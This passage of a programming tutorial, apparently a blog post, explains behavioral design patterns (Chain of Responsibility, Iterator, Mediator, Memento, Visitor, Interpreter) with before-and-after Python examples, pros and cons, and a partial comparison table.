class="sh">"</span><span class="p">)</span> <span class="c1"># Build chain </span><span class="n">console</span> <span class="o">=</span> <span class="nc">ConsoleLogger</span><span class="p">()</span> <span class="nb">file</span> <span class="o">=</span> <span class="nc">FileLogger</span><span class="p">(</span><span class="n">console</span><span class="p">)</span> <span class="n">error</span> <span class="o">=</span> <span class="nc">ErrorLogger</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span> <span class="c1"># Log at different levels </span><span class="n">error</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="sh">"</span><span class="s">Info message</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Logged by console </span><span class="n">error</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="sh">"</span><span class="s">Warning message</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Logged by console and file </span><span class="n">error</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="sh">"</span><span class="s">Error message</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Logged by all </span></code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Decouples senders from receivers</li> <li>Easy to add/remove handlers</li> <li>Flexible composition of handlers</li> <li>Follows Single Responsibility</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>No guarantee request is handled</li> <li>Harder to debug request flow</li> <li>Can impact performance with many handlers</li> </ul> <p><strong>My Take:</strong></p> <p>Chain of Responsibility is perfect for anything involving escalation or filtering.</p> <p>You use it constantly:</p> <ul> <li> <strong>Middleware in web frameworks</strong> (Django, Flask)</li> <li> <strong>Event propagation</strong> in UI systems</li> <li> <strong>Logging systems</strong> with multiple outputs</li> <li> <strong>Validation chains</strong> checking multiple conditions</li> <li> <strong>Request processing</strong> pipelines</li> </ul> <p>The key insight: <strong>Pass the request down the chain until someone handles it.</strong></p> <h3> 7. Iterator Pattern </h3> <p>The Iterator pattern provides a way to access elements of a collection sequentially without exposing its underlying representation.</p> <p>Think about how you loop through lists in Python:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">for</span> <span class="n">item</span> <span class="ow">in</span> <span class="n">items</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="n">item</span><span class="p">)</span> </code></pre> </div> <p>You don't care whether <code>items</code> is a list, set, database cursor, or generator.</p> <p>The iteration mechanism is hidden.</p> <p>That's Iterator.</p> <p><strong>When to use it:</strong></p> <ul> <li>Traversing complex collections</li> <li>Tree structures</li> <li>Database cursors</li> <li>Streaming data</li> <li>Paginated APIs</li> <li>Graph traversal</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">BookCollection</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">books</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">def</span> <span class="nf">get_book</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">index</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">books</span><span class="p">[</span><span class="n">index</span><span class="p">]</span> <span class="n">library</span> <span class="o">=</span> <span class="nc">BookCollection</span><span class="p">()</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="nf">len</span><span class="p">(</span><span class="n">library</span><span class="p">.</span><span class="n">books</span><span class="p">)):</span> <span class="nf">print</span><span class="p">(</span><span class="n">library</span><span class="p">.</span><span class="nf">get_book</span><span class="p">(</span><span class="n">i</span><span class="p">))</span> </code></pre> </div> <p><strong>Problems:</strong></p> <ul> <li>Client depends on internal structure</li> <li>Traversal logic is duplicated</li> <li>Changing storage breaks clients</li> </ul> <h3> Good code (with Iterator) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">BookCollection</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">_books</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">book</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">_books</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">book</span><span class="p">)</span> <span class="k">def</span> <span class="nf">__iter__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nf">iter</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">_books</span><span class="p">)</span> <span class="n">library</span> <span class="o">=</span> <span class="nc">BookCollection</span><span class="p">()</span> <span class="n">library</span><span class="p">.</span><span class="nf">add</span><span class="p">(</span><span class="sh">"</span><span class="s">Clean Code</span><span class="sh">"</span><span class="p">)</span> <span class="n">library</span><span class="p">.</span><span class="nf">add</span><span class="p">(</span><span class="sh">"</span><span class="s">Design Patterns</span><span class="sh">"</span><span class="p">)</span> <span class="n">library</span><span class="p">.</span><span class="nf">add</span><span class="p">(</span><span class="sh">"</span><span class="s">Refactoring</span><span class="sh">"</span><span class="p">)</span> <span class="k">for</span> <span class="n">book</span> <span class="ow">in</span> <span class="n">library</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="n">book</span><span class="p">)</span> </code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Hides collection implementation</li> <li>Simplifies traversal</li> <li>Supports multiple traversal strategies</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Extra abstraction layer</li> <li>Can be unnecessary for simple collections</li> </ul> <p><strong>My Take:</strong></p> <p>Python gives you Iterator for free with <code>__iter__()</code> and generators.</p> <p>Every time you use <code>for item in collection</code>, you're using Iterator.</p> <p>The key insight: <strong>Expose data through iteration, not indexes.</strong></p> <h3> 8. Mediator Pattern </h3> <p>The Mediator pattern defines an object that encapsulates how other objects interact.</p> <p>Instead of objects talking directly to each other, they communicate through a central mediator.</p> <p>Think about an air traffic control tower.</p> <p>Pilots don't communicate with every other plane.</p> <p>They talk to the tower.</p> <p>The tower coordinates everything.</p> <p><strong>When to use it:</strong></p> <ul> <li>Chat applications</li> <li>UI components</li> <li>Workflow orchestration</li> <li>Microservice coordination</li> <li>Event hubs</li> <li>Air traffic systems</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">User</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">name</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">name</span> <span class="n">self</span><span class="p">.</span><span class="n">contacts</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">def</span> <span class="nf">send</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span> <span class="k">for</span> <span class="n">contact</span> <span class="ow">in</span> <span class="n">self</span><span class="p">.</span><span class="n">contacts</span><span class="p">:</span> <span class="n">contact</span><span class="p">.</span><span class="nf">receive</span><span class="p">(</span><span class="n">message</span><span class="p">)</span> <span class="k">def</span> <span class="nf">receive</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="n">message</span><span class="p">)</span> </code></pre> </div> <p><strong>Problems:</strong></p> <ul> <li>Objects become tightly coupled.</li> <li>Every participant must know about others.</li> <li>Communication logic is duplicated.</li> <li>Adding new participants requires updating existing code.</li> <li>Interaction flows become difficult to maintain.</li> </ul> <h3> Good code (with Mediator) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">abc</span> <span class="kn">import</span> <span class="n">ABC</span><span class="p">,</span> <span class="n">abstractmethod</span> <span class="k">class</span> <span class="nc">ChatMediator</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">send</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">message</span><span class="p">,</span> <span class="n">sender</span><span class="p">):</span> <span class="k">pass</span> <span class="k">class</span> <span class="nc">ChatRoom</span><span class="p">(</span><span class="n">ChatMediator</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">users</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">def</span> <span class="nf">add_user</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">user</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">users</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">user</span><span class="p">)</span> <span class="k">def</span> <span class="nf">send</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">message</span><span class="p">,</span> <span class="n">sender</span><span class="p">):</span> <span class="k">for</span> <span class="n">user</span> <span class="ow">in</span> <span class="n">self</span><span class="p">.</span><span class="n">users</span><span class="p">:</span> <span class="k">if</span> <span class="n">user</span> <span class="o">!=</span> <span class="n">sender</span><span class="p">:</span> <span class="n">user</span><span class="p">.</span><span class="nf">receive</span><span class="p">(</span><span class="n">message</span><span class="p">)</span> <span class="k">class</span> <span class="nc">User</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">mediator</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">name</span> <span class="n">self</span><span class="p">.</span><span class="n">mediator</span> <span class="o">=</span> <span class="n">mediator</span> <span class="k">def</span> <span class="nf">send</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">mediator</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">name</span><span class="si">}</span><span class="s">: </span><span class="si">{</span><span class="n">message</span><span class="si">}</span><span class="sh">"</span><span class="p">,</span> <span class="n">self</span> <span class="p">)</span> <span class="k">def</span> <span class="nf">receive</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="n">message</span><span class="p">)</span> </code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Reduces coupling</li> <li>Centralizes communication logic</li> <li>Easier to maintain interactions</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Mediator can become a god object</li> </ul> <p><strong>My Take:</strong></p> <p>The key insight: <strong>Replace many-to-many communication with one-to-many communication through a coordinator.</strong></p> <h3> 9. Memento Pattern </h3> <p>The Memento pattern captures and externalizes an object's internal state so it can be restored later.</p> <p>Think about:</p> <ul> <li>Undo/redo</li> <li>Game saves</li> <li>Checkpoints</li> <li>Snapshots</li> <li>Database transactions</li> </ul> <p><strong>When to use it:</strong></p> <ul> <li>Save functionality</li> <li>Version history</li> <li>Rollbacks</li> <li>Checkpoint systems</li> </ul> <h3> Bad code (without pattern) — Memento </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">Editor</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">text</span> <span class="o">=</span> <span class="sh">""</span> <span class="n">self</span><span class="p">.</span><span class="n">history</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">def</span> <span class="nf">write</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">text</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">text</span> <span class="o">+=</span> <span class="n">text</span> <span class="k">def</span> <span class="nf">save</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">history</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">text</span><span class="p">)</span> <span class="k">def</span> <span class="nf">undo</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="n">history</span><span class="p">:</span> <span class="n">self</span><span class="p">.</span><span class="n">text</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">history</span><span class="p">.</span><span class="nf">pop</span><span class="p">()</span> <span class="n">usage</span> <span class="o">=</span> <span class="nc">Editor</span><span class="p">()</span> <span class="n">usage</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="sh">"</span><span class="s">Hello </span><span class="sh">"</span><span class="p">)</span> <span class="n">usage</span><span class="p">.</span><span class="nf">save</span><span class="p">()</span> <span class="n">usage</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="sh">"</span><span class="s">World</span><span class="sh">"</span><span class="p">)</span> <span class="n">usage</span><span class="p">.</span><span class="nf">save</span><span class="p">()</span> <span class="n">usage</span><span class="p">.</span><span class="nf">undo</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="n">usage</span><span class="p">.</span><span class="n">text</span><span class="p">)</span> </code></pre> </div> <p><strong>Problems:</strong></p> <ul> <li>The editor manages both editing and history tracking.</li> <li>Internal state is exposed directly.</li> <li>Undo logic is tightly coupled to the editor.</li> <li>Difficult to support advanced features like redo, snapshots, or branching history.</li> <li>Violates the Single Responsibility Principle.</li> </ul> <h3> Good code (with Memento) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">EditorMemento</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">text</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">_text</span> <span class="o">=</span> <span class="n">text</span> <span class="k">def</span> <span class="nf">get_state</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">_text</span> <span class="k">class</span> <span class="nc">Editor</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">text</span> <span class="o">=</span> <span class="sh">""</span> <span class="k">def</span> <span class="nf">write</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">text</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">text</span> <span class="o">+=</span> <span class="n">text</span> <span class="k">def</span> <span class="nf">save</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nc">EditorMemento</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">text</span><span class="p">)</span> <span class="k">def</span> <span class="nf">restore</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">memento</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">text</span> <span class="o">=</span> <span class="n">memento</span><span class="p">.</span><span class="nf">get_state</span><span class="p">()</span> <span class="k">class</span> <span class="nc">History</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">_states</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">def</span> <span class="nf">push</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">memento</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">_states</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">memento</span><span class="p">)</span> <span class="k">def</span> <span class="nf">pop</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">_states</span><span class="p">.</span><span class="nf">pop</span><span class="p">()</span> </code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Encapsulates object state</li> <li>Simplifies rollback</li> <li>Supports history management</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Can consume memory</li> <li>Expensive for large objects</li> </ul> <p><strong>My Take:</strong></p> <p>Command + Memento is how professional editors implement undo systems.</p> <p>The key insight: <strong>Save snapshots instead of reverse-engineering state changes.</strong></p> <h3> 10. Visitor Pattern </h3> <p>The Visitor pattern lets you add new operations to existing object structures without modifying those objects.</p> <p>Think about a file system:</p> <ul> <li>Calculate size</li> <li>Export data</li> <li>Validate structure</li> <li>Generate reports</li> </ul> <p>You don't want to keep modifying file classes every time.</p> <p><strong>When to use it:</strong></p> <ul> <li>Stable object structures</li> <li>Multiple unrelated operations</li> <li>Reporting systems</li> <li>Compilers</li> <li>AST processing</li> </ul> <h3> Bad code (without pattern) — Visitor </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">ImageFile</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">size</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="o">=</span> <span class="n">size</span> <span class="k">def</span> <span class="nf">calculate_size</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="k">def</span> <span class="nf">export_json</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="p">{</span> <span class="sh">"</span><span class="s">type</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">image</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">size</span><span class="sh">"</span><span class="p">:</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="p">}</span> <span class="k">def</span> <span class="nf">validate</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="k">class</span> <span class="nc">VideoFile</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">size</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="o">=</span> <span class="n">size</span> <span class="k">def</span> <span class="nf">calculate_size</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="k">def</span> <span class="nf">export_json</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="p">{</span> <span class="sh">"</span><span class="s">type</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">video</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">size</span><span class="sh">"</span><span class="p">:</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="p">}</span> <span class="k">def</span> <span class="nf">validate</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="o">&gt;</span> <span class="mi">0</span> </code></pre> </div> <p><strong>Problems:</strong></p> <ul> <li>Classes grow endlessly.</li> <li>Adding new operations requires changing existing code.</li> <li>Violates the Open/Closed Principle.</li> <li>Business logic becomes scattered across domain objects.</li> <li>High risk of introducing bugs when adding features.</li> </ul> <h3> Good code (with Visitor) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">abc</span> <span class="kn">import</span> <span class="n">ABC</span><span class="p">,</span> <span class="n">abstractmethod</span> <span class="k">class</span> <span class="nc">Visitor</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">visit_file</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="nb">file</span><span class="p">):</span> <span class="k">pass</span> <span class="k">class</span> <span class="nc">FileElement</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">accept</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">visitor</span><span class="p">):</span> <span class="k">pass</span> <span class="k">class</span> <span class="nc">ImageFile</span><span class="p">(</span><span class="n">FileElement</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">size</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="o">=</span> <span class="n">size</span> <span class="k">def</span> <span class="nf">accept</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">visitor</span><span class="p">):</span> <span class="n">visitor</span><span class="p">.</span><span class="nf">visit_file</span><span class="p">(</span><span class="n">self</span><span class="p">)</span> <span class="k">class</span> <span class="nc">SizeVisitor</span><span class="p">(</span><span class="n">Visitor</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">total</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">def</span> <span class="nf">visit_file</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="nb">file</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">total</span> <span class="o">+=</span> <span class="nb">file</span><span class="p">.</span><span class="n">size</span> </code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Add new operations easily</li> <li>Keeps domain objects clean</li> <li>Follows Open/Closed Principle</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Hard to add new element types</li> <li>More complex syntax</li> </ul> <p><strong>My Take:</strong></p> <p>Visitor is common in compilers, parsers, and AST processing.</p> <p>The key insight: <strong>When your data structure is stable but operations change frequently, use Visitor.</strong></p> <h3> 11. Interpreter Pattern </h3> <p>The Interpreter pattern defines a grammar for a language and provides an interpreter to evaluate sentences in that language.</p> <p>In simple terms:</p> <p>It lets you build your own mini-language.</p> <p>Think about:</p> <ul> <li>Search query syntax (<code>status:open AND priority:high</code>)</li> <li>Mathematical expressions (<code>5 + 3 * 2</code>)</li> <li>Rule engines (<code>age &gt; 18 AND country == "US"</code>)</li> <li>SQL-like filters</li> <li>Domain-Specific Languages (DSLs)</li> </ul> <p>Instead of hardcoding endless conditionals, you represent rules as objects that can interpret themselves.</p> <p><strong>When to use it:</strong></p> <ul> <li>Expression evaluators</li> <li>Rule engines</li> <li>Query parsers</li> <li>Configuration languages</li> <li>DSLs</li> <li>Compilers and parsers</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">evaluate</span><span class="p">(</span><span class="n">rule</span><span class="p">,</span> <span class="n">context</span><span class="p">):</span> <span class="k">if</span> <span class="n">rule</span> <span class="o">==</span> <span class="sh">"</span><span class="s">is_admin</span><span class="sh">"</span><span class="p">:</span> <span class="k">return</span> <span class="n">context</span><span class="p">[</span><span class="sh">"</span><span class="s">role</span><span class="sh">"</span><span class="p">]</span> <span class="o">==</span> <span class="sh">"</span><span class="s">admin</span><span class="sh">"</span> <span class="k">elif</span> <span class="n">rule</span> <span class="o">==</span> <span class="sh">"</span><span class="s">is_premium</span><span class="sh">"</span><span class="p">:</span> <span class="k">return</span> <span class="n">context</span><span class="p">[</span><span class="sh">"</span><span class="s">subscription</span><span class="sh">"</span><span class="p">]</span> <span class="o">==</span> <span class="sh">"</span><span class="s">premium</span><span class="sh">"</span> <span class="k">elif</span> <span class="n">rule</span> <span class="o">==</span> <span class="sh">"</span><span class="s">is_adult</span><span class="sh">"</span><span class="p">:</span> <span class="k">return</span> <span class="n">context</span><span class="p">[</span><span class="sh">"</span><span class="s">age</span><span class="sh">"</span><span class="p">]</span> <span class="o">&gt;=</span> <span class="mi">18</span> <span class="c1"># This keeps growing forever... </span></code></pre> </div> <p><strong>Problems:</strong></p> <ul> <li>Giant conditional statements</li> <li>Hard to extend</li> <li>Business rules are scattered</li> <li>No composability</li> </ul> <h3> Good code (with Interpreter) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">abc</span> <span class="kn">import</span> <span class="n">ABC</span><span class="p">,</span> <span class="n">abstractmethod</span> <span class="k">class</span> <span class="nc">Expression</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">interpret</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">context</span><span class="p">):</span> <span class="k">pass</span> <span class="k">class</span> <span class="nc">GreaterThan</span><span class="p">(</span><span class="n">Expression</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">field</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">field</span> <span class="o">=</span> <span class="n">field</span> <span class="n">self</span><span class="p">.</span><span class="n">value</span> <span class="o">=</span> <span class="n">value</span> <span class="k">def</span> <span class="nf">interpret</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">context</span><span class="p">):</span> <span class="k">return</span> <span class="n">context</span><span class="p">[</span><span class="n">self</span><span class="p">.</span><span class="n">field</span><span class="p">]</span> <span class="o">&gt;</span> <span class="n">self</span><span class="p">.</span><span class="n">value</span> <span class="k">class</span> <span class="nc">Equals</span><span class="p">(</span><span class="n">Expression</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">field</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">field</span> <span class="o">=</span> <span class="n">field</span> <span class="n">self</span><span class="p">.</span><span class="n">value</span> <span class="o">=</span> <span class="n">value</span> <span class="k">def</span> <span class="nf">interpret</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">context</span><span class="p">):</span> <span class="k">return</span> <span class="n">context</span><span class="p">[</span><span class="n">self</span><span class="p">.</span><span class="n">field</span><span class="p">]</span> <span class="o">==</span> <span class="n">self</span><span class="p">.</span><span class="n">value</span> <span class="k">class</span> <span class="nc">And</span><span class="p">(</span><span class="n">Expression</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">left</span><span class="p">,</span> <span class="n">right</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">left</span> <span class="o">=</span> <span class="n">left</span> <span class="n">self</span><span class="p">.</span><span class="n">right</span> <span class="o">=</span> <span class="n">right</span> <span class="k">def</span> <span class="nf">interpret</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">context</span><span class="p">):</span> <span class="nf">return </span><span class="p">(</span> <span class="n">self</span><span class="p">.</span><span class="n">left</span><span class="p">.</span><span class="nf">interpret</span><span class="p">(</span><span class="n">context</span><span class="p">)</span> <span class="ow">and</span> <span class="n">self</span><span class="p">.</span><span class="n">right</span><span class="p">.</span><span class="nf">interpret</span><span class="p">(</span><span class="n">context</span><span class="p">)</span> <span class="p">)</span> <span class="c1"># Build expression: # age &gt; 18 AND subscription == "premium" </span> <span class="n">rule</span> <span class="o">=</span> <span class="nc">And</span><span class="p">(</span> <span class="nc">GreaterThan</span><span class="p">(</span><span class="sh">"</span><span class="s">age</span><span class="sh">"</span><span class="p">,</span> <span class="mi">18</span><span class="p">),</span> <span class="nc">Equals</span><span class="p">(</span><span class="sh">"</span><span class="s">subscription</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">premium</span><span class="sh">"</span><span class="p">)</span> <span class="p">)</span> <span class="n">user</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">age</span><span class="sh">"</span><span class="p">:</span> <span class="mi">25</span><span class="p">,</span> <span class="sh">"</span><span class="s">subscription</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">premium</span><span class="sh">"</span> <span class="p">}</span> <span class="nf">print</span><span class="p">(</span><span class="n">rule</span><span class="p">.</span><span class="nf">interpret</span><span class="p">(</span><span class="n">user</span><span class="p">))</span> <span class="c1"># True </span></code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Easy to add new expressions</li> <li>Business rules become composable</li> <li>Grammar is explicit</li> <li>Follows Open/Closed Principle</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Creates many small classes</li> <li>Can become complex for large grammars</li> <li>Performance overhead for deep expression trees</li> </ul> <p><strong>My Take:</strong></p> <p>Interpreter is one of the least-used GoF patterns in everyday application development.</p> <p>Most developers use existing libraries instead of building interpreters from scratch.</p> <p>But you'll see it everywhere under the hood:</p> <ul> <li>SQL parsers</li> <li>Regex engines</li> <li>Elasticsearch queries</li> <li>GraphQL resolvers</li> <li>Policy engines</li> <li>Template engines</li> </ul> <p>The key insight: <strong>If users need to express rules dynamically, create a language instead of adding more conditionals.</strong></p> <h2> Comparison Table </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Pattern</th> <th>Purpose</th> <th>Complexity</th> <th>When to Use</th> </tr> </thead> <tbody> <tr> <td>Strategy</td> <td>Choose algorithm at runtime</td> <td>Low</td> <td>Multiple ways to do same thing</td> </tr> <tr> <td>Observer</td> <td>Notify multiple objects of state changes</td> <td>Medium</td> <td>Event systems, real-time updates</td> </tr> <tr> <td>Command</td> <td>Encapsulate requests as objects</td> 